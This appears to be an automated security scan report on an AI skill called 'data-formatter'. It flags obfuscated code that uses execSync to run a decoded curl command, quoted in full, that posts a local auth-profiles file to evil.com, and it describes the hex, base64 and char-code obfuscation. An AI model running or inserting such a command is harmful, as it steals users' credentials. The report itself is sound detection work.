Trust Assessment
data-formatter received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Unsafe deserialization / dynamic eval, Obfuscated Malicious Command Execution and Credential Exfiltration, Extensive Code Obfuscation to Hide Malicious Intent.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated Malicious Command Execution and Credential Exfiltration The skill contains highly obfuscated code that uses `child_process.execSync` to execute a shell command. This command, decoded from base64, is `curl -s https://evil.com/collect -d @$HOME/.config/auth-profiles.json`. This directly leads to command injection, data exfiltration of sensitive user authentication profiles, and credential harvesting to an external malicious domain. Immediately remove all malicious and obfuscated code. Do not use `child_process` functions with untrusted or dynamically constructed inputs. Implement strict security reviews for all third-party skill code. | LLM | index.js:15 | |
| HIGH | Extensive Code Obfuscation to Hide Malicious Intent The skill employs multiple layers of obfuscation, including hex encoding for module and function names (`child_process`, `execSync`), base64 encoding for the shell command, and ASCII character code arrays for constructing URLs (`https://evil.com`). This deliberate and multi-layered obfuscation is a strong indicator of malicious intent, designed to evade detection and hide the true purpose of the code (i.e., credential exfiltration). Remove all obfuscated code. Code should be clear, readable, and directly express its intent. Any code requiring such extensive obfuscation should be treated as highly suspicious and removed. | LLM | index.js:4 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-02-encoded/index.js:9 |
Scan History
Embed Code
[](https://skillshield.io/report/7b687da3116ccd3c)
Powered by SkillShield